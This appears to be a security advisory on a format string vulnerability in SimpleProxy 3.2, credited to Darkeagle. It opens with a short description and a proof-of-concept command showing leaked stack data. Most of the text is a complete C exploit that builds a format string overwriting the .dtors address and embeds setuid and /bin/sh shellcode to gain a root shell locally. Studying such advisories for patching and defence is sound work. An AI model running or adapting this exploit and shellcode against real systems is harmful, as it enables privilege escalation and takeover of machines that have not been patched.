Summary
"simpleproxy acts as a simple TCP proxy. It opens a listening socket on the local machine and forwards any connection to a remote host. It can be run as a daemon or through inetd."

Due to improper use of user provided data attackers can provide the program a format string which in turn can be used to execute arbitrary code.

Credit:
The information has been provided by Darkeagle.
The original article can be found at: http://exploiterz.org/simpleprx-exp.c

Details
Vulnerable Systems:
* SimpleProxy version 3.2

Exploit:
/*
\ SimpleProxy 3.2 local format string exploit
-/ by Darkeagle
\
-/ syslog() function in simpleproxy.c
*
*++++++++++++++++++++++++++++++++++++++++
static void log(int type, char *format, ...)
{
...
#if HAVE_SYSLOG
syslog(type,buffer);
...
}

static struct lst_record *load_pop3_list(const char *popfile)
{
...
if(*str=='\0') continue;
log(LOG_INFO,"Adding '%s' to POP3 users list",str);
...
}
*++++++++++++++++++++++++++++++++++++++++
*

Also exists other vulnerable calls of log() function, including remote call
One more local exists in -P parameter:

[darkeagle@localhost simpleproxy-3.2]$ ./simpleproxy -L 3337 -R localhost:110 -d -v -p1 -f sample.cfg -P AAAA%8$\x
[darkeagle@localhost simpleproxy-3.2]$ tail -2 /var/log/syslog
Aug 27 00:14:05 localhost simpleproxy[5755]: Can't open POP3 file: AAAA4141203a
Aug 27 00:14:05 localhost simpleproxy[5756]: Error binding socket.
[darkeagle@localhost simpleproxy-3.2]$

very easy to exploit.

to sploit simpleproxy put in -P parameter 'popa3d.txt' value.
bug was corrected in latest version (3.4).
enough.
\
-/
\
-/
\
-/
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// We must begun !!!

#define doit( b0, b1, b2, b3, addr ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
}

char
shellcode[]=
"\x31\xc0"
"\x31\xdb"
"\x31\xc9"
"\xb0\x46"
"\xcd\x80"
"\x31\xc0"
"\x50"
"\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x8d\x54\x24\x08"
"\x50"
"\x53"
"\x8d\x0c\x24"
"\xb0\x0b"
"\xcd\x80"
"\x31\xc0"
"\xb0\x01"
"\xcd\x80";

char *
evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
char * buf;
unsigned char b0, b1, b2, b3;
int start = 256;

doit( b0, b1, b2, b3, retaddr );
buf = (char *)malloc(999);
memset( buf, 0, 999 );

b3 -= figure;
b2 -= figure;
b1 -= figure;
b0 -= figure;

snprintf( buf, 999,
"%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
b3 - (sizeof( size_t ) * 4) + start - base, offset,
b2 - b3 + start, offset + 1,
b1 - b2 + start, offset + 2,
b0 - b1 + start, offset + 3 );

return buf;
}

int
main( int argc, char * argv[] )
{
char * fmt;
char endian[555];
unsigned long locaddr, retaddr;
unsigned int offset, base;
unsigned char b0, b1, b2, b3;
FILE *file;

memset( endian, 0, 555 );

file = fopen("popa3d.txt", "w+");

locaddr = 0x804ce20; // dtorz addrz :=)
retaddr = 0xbfffec54; // shellcode addr
offset = 5;
locaddr += 0x4; // dtorz+0x4

doit( b0, b1, b2, b3, locaddr );

base = 4;

snprintf( endian, sizeof(endian),
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c",
b3, b2, b1, b0,
b3 + 1, b2, b1, b0,
b3 + 2, b2, b1, b0,
b3 + 3, b2, b1, b0 );

fmt = evil_builder( retaddr, offset, base, 0x4 );

memset(fmt+strlen(fmt), 0x42, 48);
strcat(fmt, shellcode);
strcat(endian, fmt);
fprintf(file, "%s", endian);
return 0;
}